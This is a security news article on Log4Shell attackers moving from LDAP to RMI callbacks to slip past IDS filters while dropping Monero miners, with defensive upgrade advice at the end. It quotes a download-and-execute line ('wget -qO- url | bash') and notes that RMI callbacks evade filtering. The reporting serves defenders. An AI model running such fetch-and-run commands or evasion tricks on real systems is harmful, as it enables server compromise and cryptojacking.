Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
For now, this trend has been observed in attacks by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.
Most attacks targeting the Log4j “Log4Shell” vulnerability have been through the LDAP (Lightweight Directory Access Protocol) service.
The switch to RMI (Remote Method Invocation) API seems counter-intuitive at first, considering that this mechanism is subject to additional checks and constraints, but that’s not always the case.
Some JVM (Java Virtual Machine) versions do not enforce stringent policies, and as such, RMI can sometimes be an easier channel to achieving RCE (remote code execution) than LDAP.
Moreover, LDAP requests are now solidified as part of the infection chain and are more tightly monitored by defenders.
For example, many IDS/IPS tools are currently filtering requests with JNDI and LDAP, so there’s a chance that RMI may be ignored at this point.
In some cases, Juniper saw both RMI and LDAP services in the same HTTP POST request.
However, for all actors attempting to abuse the Log4Shell vulnerability, the goal remains the same – sending an exploit string to be processed by the vulnerable Log4j server, leading to code execution on the target.
The above attack causes a bash shell to be spawned that downloads a shell script from a remote server.
“This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script,” explains the Juniper Labs report.
“During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine.”
In the attacks seen by Juniper Labs, threat actors are interested in mining Monero on the compromised servers and present it as an almost innocuous activity that “ain’t going to harm anyone else.”
The miner targets x86_64 Linux systems and adds persistence via the cron subsystem.
Although most attacks so far have targeted Linux systems, Check Point reports that its analysts discovered the first Win32 executable that leverages Log4Shell, called ‘StealthLoader.’
The only feasible way to defend against what has become one of the most impactful vulnerabilities in recent history is to upgrade Log4j to version 2.16.0.
Additionally, admins should keep a close eye on Apache’s security section for new version announcements and apply them immediately.
For mitigation guidance and complete technical information resources, check out CISA’s detailed page on Log4Shell.
There’s an extensive list of products affected by CVE-2021-44228, and a list with vendor-supplied advisories is constantly updated on this GitHub repository.
Finally, if you notice suspicious activity on your systems, consider reporting it to the FBI or CISA, who are working feverishly to contain the damage and remediate the situation.